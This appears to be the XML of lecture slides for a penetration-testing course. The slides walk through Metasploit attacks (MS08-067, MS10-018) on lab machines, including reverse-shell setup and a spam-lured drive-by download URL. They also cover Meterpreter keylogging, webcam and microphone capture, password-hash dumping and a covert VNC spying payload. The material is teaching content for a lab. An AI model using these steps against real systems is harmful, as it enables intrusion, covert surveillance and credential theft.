              </a:rPr>
              <a:t>Metasploit Payloads</a:t>
            </a:r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457200" y="1295400"/>
            <a:ext cx="82296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400" dirty="0"/>
              <a:t>When to use a reverse shell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/>
              <a:t>The target machine is behind a different private network.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/>
              <a:t>The target machine's firewall blocks incoming connection attempts to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bindshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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/>
              <a:t>Your payload is unable to bind to the port it wants due to whatever reason.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dirty="0"/>
              <a:t>In our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> exploit, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> module may not work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/>
              <a:t>You simply can't decide what to choose.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400" dirty="0"/>
              <a:t>When a reverse shell isn't needed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000" dirty="0"/>
              <a:t>if you can backdoor an existing service (already running on target), you may not need a reverse shell. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/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8898286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8172450" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="7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GB" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content from the book:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy”, Second Edition</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://images-na.ssl-images-amazon.com/images/I/51XLVHgA2fL._SX404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828" y="3047999"/>
            <a:ext cx="2741371" cy="337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365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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Payloads</a:t>
            </a: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457200" y="1600200"/>
            <a:ext cx="82296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/>
              <a:t>Popular shell payloads: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/>
              <a:t>windows/upexec/reverse_tcp:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600"/>
              <a:t>Generate a Windows style command line shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600"/>
              <a:t>Like running the “cmd” under Windows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/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/>
              <a:t>windows/meterpreter/bind_tcp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000"/>
              <a:t>windows/meterpreter/reverse_tcp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/>
              <a:t>Meterpreter:  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/>
              <a:t>More advanced shell, stealthy, powerful, and extensible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/>
              <a:t>Tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000"/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/>
              <a:t>Functions: reboot, shutdown, take screenshot, enable webcam, etc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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17229380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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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400"/>
              <a:t>How to set up for a reverse shell during payload generation?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000" b="1"/>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This is the IP address you want your target machine to connect to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600"/>
              <a:t>If your machine is behind a NAT (such as Wifi router), set LHOST to be your NAT’s global IP, and configure NAT to do port forwarding to your attack machine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000" b="1"/>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This the port you want your target machine to connect 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US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400"/>
              <a:t>If you want the reverse shell connect to another machine (listener), set LHOST and LPORT to the listener, and make sure the listener has started first before executing the reverse shell.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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28849612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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="82296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/>
              <a:t>Step 4: Find out what missing parameters in options that need to fill in  (show options)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/>
              <a:t>Step 5: Fill in missing options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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2048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8" y="1962150"/>
            <a:ext cx="7272337" cy="377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3" y="6276975"/>
            <a:ext cx="490537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23863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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="82296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/>
              <a:t>Step 5: Execute exploit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/>
              <a:t>Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>, type “help” to see all commands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/>
              <a:t>A good tutorial on using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>: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 dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2253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65341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71924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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Powerful Meterpreter </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="82296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/>
              <a:t>Meterpreter supports all existing Linux commands, and provides more powerful commands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/>
              <a:t>Example of interesting commands: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 dirty="0" err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  show computer system information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 dirty="0"/>
              <a:t>File download/upload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>Meterpreter&gt;download            upload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 dirty="0"/>
              <a:t>Kill:   kill a process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 dirty="0" err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  Start capturing keystrokes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 dirty="0" err="1"/>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  Stop capturing keystrokes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000" dirty="0" err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:   Dump the keystroke buffer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000" dirty="0"/>
              <a:t>Screenshot:     Grab a screenshot of the interactive desktop (image is saved in local computer)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000" dirty="0" err="1"/>
              <a:t>record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:     Record audio from the default microphone for X seconds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000" dirty="0" err="1"/>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:    Take a snapshot from the specified webcam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000" dirty="0" err="1"/>
              <a:t>Hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:      Dumps the contents of the SAM database (password database)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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6696542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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="82296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/>
              <a:t>Remote Desktop Payload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000" dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/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000" dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="20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US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400" dirty="0"/>
              <a:t>Inject a VNC server remotely, and can have the display thrown back to the attacker’s host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000" dirty="0"/>
              <a:t>Users of the target system user will not notice that their display is being shared  when in View Only mode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000" dirty="0" err="1"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> must be installed on the host system to see the VNC session thrown back by the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600" dirty="0"/>
              <a:t>Kali Linux has already installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/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US" altLang="en-US" sz="2000" dirty="0"/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 dirty="0"/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2234881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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="82296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/>
              <a:t>Remote Desktop Payload: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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2662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640080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6978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"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="414338" y="762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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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206375" y="914400"/>
            <a:ext cx="84582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/>
              <a:t>Remote Desktop Payload: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/>
              <a:t>You will be able to spy on remote target’s user activities!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/>
              <a:t>But, you cannot operate on remote computer, because one setting:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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1600"/>
              <a:t>ViewOnly              true            no        Runs the viewer in view mode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000"/>
              <a:t>Change this option as:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set ViewOnly false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>, then you can operate as a remote desktop on target machine!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="20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4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2867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036888"/>
            <a:ext cx="7978775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0192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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> Attack: MS09-001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="82296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/>
              <a:t>Let us move on to the next MS number: MS09-001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000" dirty="0"/>
              <a:t>SMB Could Allow Remote Code Execution (958687):</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/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sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/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/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="12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4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30724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538" y="3465513"/>
            <a:ext cx="4792662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TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="260350" y="3798888"/>
            <a:ext cx="323056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bg1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defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1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defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1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altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit only has an attack module to crash the remote Windows, but it is not successful in my trial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9285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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="82296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/>
              <a:t>Let us move on to the next vulnerable MS number: MS10-018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000" dirty="0"/>
              <a:t>This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer version 6 and 7.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000" dirty="0"/>
              <a:t>Advisory: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/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 err="1"/>
              <a:t>Youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> attack this bug: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 dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=BL43nXM0vSI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/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 dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/results?search_query=metasploit+attack+MS10-018</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/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8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/>
              <a:t>This is an example of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drive-by Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” attack to vulnerable Internet browser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1371667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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Vulnerable Linux: metasploitable2 Linux </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="82296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800"/>
              <a:t>It will be the target for our exploiting test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800"/>
              <a:t>First, start running this metasploitable linux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800"/>
              <a:t>Then, run Nessus on Kali or your host to scan this vulnerable Linux to find critical vulns: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8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8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8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8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800"/>
              <a:t>The Metasploitable2 has 10 “critical” vulns. We first use the “vsftpd” vulnerability to demonstrate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8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8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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="614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81400"/>
            <a:ext cx="769461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63538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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="82296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/>
              <a:t>Attack scenario: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1800" dirty="0"/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> with vulnerable IE6:   10.0.2.6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1800" dirty="0"/>
              <a:t>Attack Kali Linux:  10.0.2.15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18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" y="2273105"/>
            <a:ext cx="78390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41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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1143001"/>
            <a:ext cx="8229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/>
              <a:t>Set payload and fill in missing parameters in ‘options’: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1800" dirty="0"/>
              <a:t>SRVHOST specifies which IP address should the malicious web server set up on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1800" dirty="0"/>
              <a:t>SRVPORT specifies the listening port for the malicious website, you can change it to be 80 to make the traffic look like a normal web traffic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18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791613"/>
            <a:ext cx="7372350" cy="401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465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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1143000"/>
            <a:ext cx="82296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/>
              <a:t>Since we use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” payload, we need to set LHOST to specify the reverse connect-back IP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/>
              <a:t>Set Local server’s IP address and service port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 dirty="0"/>
              <a:t>SRVHOST,  SRVPORT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 dirty="0"/>
              <a:t>So that a local malicious Web server will run after the exploit has been executed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3048000"/>
            <a:ext cx="5599044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234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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="82296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/>
              <a:t>‘Exploit’ command will generate the malicious webserver, and tell you which URL should be sent to victim in order to trick victim to use (such as included in a spam email)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/>
              <a:t>In above example, attacker needs to lure a victim to browse URL: http://10.0.2.15:8080/RgeUtk5dw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2523124"/>
            <a:ext cx="82010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778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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="82296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/>
              <a:t>When a vulnerable IE6 connects to this webserver on the specified URL, the IE6 will shut down without any error message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/>
              <a:t>And on the attacker side, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> generated a new Meterpreter session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4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3891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429000"/>
            <a:ext cx="89154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86369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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit Attack: MS10-018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1417638"/>
            <a:ext cx="82296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/>
              <a:t>You can start to use this generated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> session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1905000"/>
            <a:ext cx="8724900" cy="3343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5520104"/>
            <a:ext cx="49625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971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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
